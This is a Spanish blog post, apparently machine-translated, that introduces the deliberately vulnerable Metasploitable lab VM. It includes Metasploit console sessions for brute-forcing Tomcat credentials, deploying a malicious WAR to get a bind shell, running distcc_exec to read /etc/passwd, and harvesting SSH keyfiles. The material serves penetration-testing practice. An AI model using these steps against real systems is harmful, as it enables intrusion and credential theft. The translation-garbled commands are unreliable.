Solapas principales

Sep 14 2012

Metasploitable

Metasploitable es una distribución linux basada en ubuntu desarrollada por el equipo de metasploit para ser usada como sistema operativo "víctima" en una virtual machine y poder practicar con metasploit framework.Ya que tiene vulnerabilidades acentuadas es ideal como banco de pruebas,test de penetración etc.
 


Una de las preguntas que a menudo se escucha es "¿Qué sistemas se pueden utilizar para para practicar ataques?" En base a esto, pensamos que sería una buena idea juntar un VM explotables que se puede utilizar para propósitos de prueba.

Metasploitable es una instalación de Ubuntu 8.04 en un servidor VMWare 6.5 imagen. Una serie de paquetes vulnerables se incluyen, como una instalación de Tomcat 5.5 (con credenciales débiles), distcc, TikiWiki, twiki, y un mysql más.

Puede utilizar la mayoría de los productos de VMware para ejecutarlo, y usted querrá asegurarse de que está configurado para redes sólo de host a menos que sea en el laboratorio - no hay necesidad de lanzar otra máquina vulnerable en la red corporativa. Que está configurado en el modo no persistente en el disco, por lo que simplemente puede restablecer si accidentalmente "rm-rf 'él.

Aquí hay un par de cosas que puedes hacer con él en msfconsole:

Uso de la "Utilidad de aplicaciones Tomcat Acceder 'proporcionada por MC, Cantoni Matteo, y jduck, puede probar las credenciales con una aplicación Tomcat (suponiendo que el componente de administrador está activada):

msf> utilizar el escáner / http / tomcat_mgr_login
msf auxiliar (tomcat_mgr_login)> rhosts conjunto metasploitable
msf auxiliar (tomcat_mgr_login)> set rport 8180
msf auxiliar (tomcat_mgr_login)> explotar
...

  • 10.0.0.33:8180 - Tratar de nombre de usuario: 'gato' con la contraseña: "role1 '
  • [-]

Http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Administrador de aplicaciones Tomcat] no ha podido iniciar la sesión como 'gato'

  • 10.0.0.33:8180 - Tratar de nombre de usuario: 'gato' con la contraseña: "root"
  • [-]

Http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Administrador de aplicaciones Tomcat] no ha podido iniciar la sesión como 'gato'

  • 10.0.0.33:8180 - Tratar de nombre de usuario: 'gato' con la contraseña: 'gato'
  • Http://10.0.0.33:8180/manager/html [Apache-Coyote/1.1] [Administrador de aplicaciones Tomcat] conectar con éxito 'gato': 'gato'
  • 10.0.0.33:8180 - Tratar de nombre de usuario: "ambas" con la contraseña: "admin"

Woot! Eso es válido (tomcat: tomcat) inicio de sesión. - Ahora que tenemos las credenciales válidas, vamos a tratar de Tomcat jduck de Administrador de aplicaciones de activacià (tomcat_mgr_deploy) en contra de ella:

msf> use multi / http / tomcat_mgr_deploy
msf exploit (tomcat_mgr_deploy)> set rhost metasploitable
msf exploit (tomcat_mgr_deploy)> configurar nombre de usuario tomcat
msf exploit (tomcat_mgr_deploy)> SET PASSWORD tomcat
msf exploit (tomcat_mgr_deploy)> set rport 8180
msf exploit (tomcat_mgr_deploy)> CARGA conjunto linux/x86/shell_bind_tcp
msf exploit (tomcat_mgr_deploy)> explotar

  • Se unen empezar manejador
  • El intento de seleccionar automáticamente un objetivo ...
  • De destino seleccionado automáticamente "Linux X86"
  • Carga de 1612 bytes como HJpy1H.war ...
  • Ejecutar / HJpy1H/EpKaNLsCQUUjo.jsp ...
  • HJpy1H anular la implementación de ...
  • El envío de la etapa (36 bytes) para metasploitable
  • Al shell de comandos 1 ª sesión abierta (10.0.0.11:39497 -> 10.0.0.33:4444) en 19/05/2010 11:53:12 -0500


Sweet! Y ... que es una concha, facilitado por un archivo malcious. WAR. El módulo distcc_exec es también una buena explotación de los tests. En este caso, vamos a utilizar una carga útil de comandos para 'cat / etc / passwd:

el uso de UNIX / misc / distcc_exec
msf exploit (distcc_exec)> set cmd CARGA / unix / genéricas
msf exploit (distcc_exec)> set rhost metasploitable
msf exploit (distcc_exec)> set CMD "cat / etc / passwd '
msf exploit (distcc_exec)> explotar
la conexión ...

  • Stdout: root: x: 0:0: root: / root: / bin / bash
  • Stdout: daemon: x: 1:1: daemon: / usr / sbin: / bin / sh

...

Código ejecutivo!

Es muy divertido correr expreso en contra de ella también. Un ataque de fuerza bruta solo de ssh o telnet volverá 5 sesiones (a partir de las 5 cuentas diferentes débil en la máquina virtual).

Una vez que tengamos una sesión abierta que se puede ejecutar "Recopilación de evidencia" y recoger cualquier keyfiles ssh desde las cuentas de usuario que accedió a. (Tenga en cuenta que usted puede hacer esto desde la consola también, de forma manual - generar un shell y compruebe los directorios de ssh.). Ahora, cuando nos encontramos otra fuerza bruta (con el "conocido" credenciales), se utiliza el keyfiles SSH para acceder a la caja.

Para descargar Metasploitable, usted puede recoger el torrent aquí . A README.txt se pueden encontrar en el torrente que contiene contraseñas (cuidado con los spoilers). Si usted es un cliente, que le permite recoger una descarga directa HTTP desde el Centro de clientes .

Metasploitable:http://blog.metasploit.com/2010/05/introducing-metasploitable.html


 

Contenido por etiquetas

Linux Linux Tips Solución Linux Help Drupal Arch-Linux Media Front Videos Terminal Linux seguridad Hacking Shell Manjaro Servers Linux-Distro Comandos Consola Linux Guías Android Screencast Ubuntu Drush Windows Joomla Mac OSX Backtrack Command Line Xampp Compiz Fusion Debian Drupal 7 Instalación Servidor Local Media Youtube Skype Cracking ROOT Virtualmin Telefonía Antergos Sysmonitor CyanogenMod KDE Elastix PDF Libros Kali Linux ownCloud Samba Server Descargar error Joomla Seguridad Setup Webmin Grub ClamAv Nivo Slider Drush_Make Escritorio Views Kali SCP SSH Unix servidor web apache Noticias PHP Rootear mysql Seguridad MacOS dd Xampp 1.8.1 Líder Virtual Chrome Katana Drush Windows url Limpias Top 500 Metasploit SEO url canonica ROM Asterisk Iphone Youtube Distros Centos Boot XFCE Joomla 3.0 Triple-Boot GCP Driver r8168 Webform Webform_Layout Views Horizontal Slider Xwinwrap dselect grep TinyMCE IMCE Imagesloaded String htaccess SA-CORE-2013-003 Gimp Prestashop Papá FINK youtube-dl Sox Códec Redgum Secure Copy Shutter Encriptar Enlaces Externos Nube Joomla 2.5 FTP Whatsapp Wine Line Archserver Redes g729 ncdu MS-SQL SQL Kingsoft Office WPS 1and1 VMplayer Inyection SQL Viber Recovery Galaxy S4 PBX Wake On Lan Drupal 8 Real Estate Alsi Streaming Atraci Tails Telegram Sigram duff Fish Wol CKEditor Fing PhpMyadmin Galaxy S3 vs Iphone 5 Webform Layout Horizontal Slider Media Vimeo MediaFront Acquia Tilt 3D Cain & Abel Office winAUTOPWN firestarter gh22ns50 LPS Conky CryptKeeper Rarcrack Open DNS exec: 90: : Permission denied Galaxy S (bootstrap) DARKY´S ROM .make Metasploitable Overlook Fing fallo sistema internal server error 500 Cerebro FDesktopRecorder Piropos Geek Texto Sustituir Jdownloader 10 Millones Ahorra Migrar bitacora Munich LAMP Supercomputadoras sniffing Script Google-Earth Arranque compartir red firewall Aircrack-ng Windows 10